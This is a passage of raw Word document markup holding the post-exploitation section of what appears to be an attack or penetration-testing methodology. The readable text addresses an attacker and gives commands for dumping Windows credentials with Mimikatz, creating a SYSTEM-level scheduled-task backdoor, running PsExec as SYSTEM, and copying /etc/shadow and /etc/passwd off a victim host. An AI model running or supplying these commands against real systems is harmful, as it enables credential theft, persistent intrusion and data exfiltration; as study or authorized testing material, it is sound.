            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (to stabilize shells post-exploitation)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2164B3" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F20EF2F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D84B4D8" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="371A82FC" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F1FC016" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5018CADB" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="622B1C9B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AF5597A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="217657C4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5411C7C1" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="492910E1" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47795271" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="145C9690" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F08E02A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="528C7A88" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="04CAD80E" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="724B2FEB" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>4. Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="497A3080" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>After breaching the target, it’s essential to assess the scope of access gained. At this stage, creativity is key — from maintaining access to gathering as much sensitive data as possible.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA36827" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADF8F36" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Credential Dumping</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Use tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Empire</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to extract credentials. With </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kerberoasting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LSA dumping</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, you can harvest credentials from memory: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sekurlsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>logonpasswords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D85EBF4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: As an experienced attacker, you know that merely dumping credentials isn’t enough. Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>scheduled tasks</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WMI persistence</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Golden Ticket attacks</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to maintain long-term access. </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>schtasks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> /create /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> "Updater" /tr "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> /c &lt;backdoor.exe&gt;" /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> hourly /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ru</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> SYSTEM</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B9A152" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: You use encrypted channels to exfiltrate sensitive data to evade detection. Tools like </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DNS tunneling</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ICMP exfiltration</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> are used in advanced cases to stealthily extract data without triggering alerts: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>user@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>victim</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/shadow .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>extracted_shadow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2D6E8AAD" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00871A44" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Executed Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>privilege::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>debug" "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sekurlsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>logonpasswords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Extract Windows logon passwords) - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>psexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -s cmd.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Execute as SYSTEM remotely via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PsExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">) - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>root@victim</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/passwd .</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Exfiltrate sensitive data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="20CFBA1A" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="74CF5651" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
